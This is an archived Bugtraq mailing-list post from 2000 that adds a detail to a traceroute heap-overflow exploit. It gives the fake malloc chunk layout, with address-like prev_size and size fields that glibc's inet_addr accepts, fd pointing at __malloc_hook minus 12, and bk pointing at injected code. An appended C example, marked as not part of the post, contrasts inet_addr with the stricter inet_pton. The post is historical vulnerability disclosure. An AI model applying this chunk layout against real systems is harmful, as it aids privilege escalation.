Bugtraq mailing list archives

Addendum: Traceroute exploit


From: pedward () WEBCOM COM
Date: Mon, 2 Oct 2000 22:25:45 -0700

I just saw Pavel's note and looked at glibc; inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry () webcom com             System Architecture               Think Blue.  /\
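
Added example, not part of the original post: a small C comparison of `inet_addr`, the parser discussed in the message, with the strict `inet_pton`, showing why input that must be only a dotted quad should be validated with the latter. The helper names and the sample strings are constructed for illustration.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>

/* Legacy check: 1 if inet_addr() returns anything other than INADDR_NONE.
 * What it tolerates after the address depends on the libc in use. */
int legacy_accepts(const char *s) {
    return inet_addr(s) != INADDR_NONE;
}

/* Strict check: inet_pton() accepts only four decimal octets separated by
 * dots, and the address must be the entire string. */
int strict_accepts(const char *s) {
    struct in_addr a;
    return inet_pton(AF_INET, s, &a) == 1;
}

int main(void) {
    /* Constructed sample inputs, not taken from the post. */
    const char *samples[] = {
        "1.1.1.1",      /* clean dotted quad */
        "1.1.1.1 AAAA", /* address, whitespace, then extra bytes */
        "1.1",          /* shorthand form */
        "1.1.1.1."      /* trailing dot */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("%-16s inet_addr=%d inet_pton=%d\n", samples[i],
               legacy_accepts(samples[i]), strict_accepts(samples[i]));
    }
    return 0;
}
```

Any string for which the two columns differ is input that passes the legacy parser while still carrying bytes that are not part of the address.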

